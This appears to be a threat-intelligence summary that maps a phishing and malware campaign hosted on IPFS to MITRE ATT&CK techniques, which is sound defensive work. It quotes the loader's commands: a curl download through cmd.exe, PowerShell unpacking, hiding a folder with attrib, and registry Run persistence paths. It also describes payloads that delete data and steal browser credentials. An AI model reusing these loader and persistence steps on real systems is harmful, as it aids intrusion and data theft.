Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns

MITRE Techniques

• [T1566.002] Phishing: Spearphishing Link – The campaign uses emails purporting to be from a legitimate service to lure victims to IPFS-hosted pages. ‘The victim received a PDF that purports to be associated with the DocuSign document-signing service.’
• [T1105] Ingress Tool Transfer – The downloader retrieves a payload from an IPFS gateway. ‘The downloader reaches out to an IPFS gateway to retrieve a blob of data that has been hosted within the IPFS network.’
• [T1059.003] Windows Command Shell – The loader uses cmd.exe to run commands, including downloading Python embed ZIP. ‘C:Windowssystem32cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%MicrosoftNetworkpython-3.10.4-embed-amd64.zip’
• [T1059.001] PowerShell – The loader expands archives using PowerShell to unpack the downloaded Python package. ‘powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%MicrosoftNetwork’
• [T1547.001] Registry Run Keys/Startup Folder – Persistence by adding registry Run entries. ‘HKLMSoftwareMicrosoftWindowsNTCurrentVersionWinlogon’ and ‘HKLMSoftwareMicrosoftWindowsCurrentVersionRun’
• [T1564.001] Hide Artifacts – The loader hides artifacts by setting System and Hidden attributes. ‘attrib +S +H %appdata%MicrosoftNetwork’
• [T1059.006] Python – The final payload is executed as Python, indicating Python as a loader/interpreter. ‘…python.exe Packages.txt’
• [T1059.006] Python (Loader/Payload) – The loader invokes Python to execute the final payload, demonstrating the use of Python-based components in the chain. ‘The loader invokes the newly downloaded Python executable and passes the final payload as a command line argument…’
• [T1490] Inhibit System Recovery – Destructive payloads attempt to delete system recovery options. ‘Deleting volume shadow copies on the system.’
• [T1485] Data Destruction – Destructive payloads delete user directories and mounted filesystems. ‘Deleting directory contents stored within C:Users…’
• [T1555.003] Credentials from Web Browsers – Hannabi Grabber collects password and cookies from Chrome. ‘collects password and cookie data from Chrome.’
• [T1071.001] Web Protocols – C2 channel uses Discord Webhooks for command and control and exfiltration. ‘uses Discord Webhooks for C2 and data exfiltration.’
• [T1041] Exfiltration Over C2 Channel – Data is transmitted to attacker-controlled Discord servers. ‘transmits that data to an attacker-controlled Discord server.’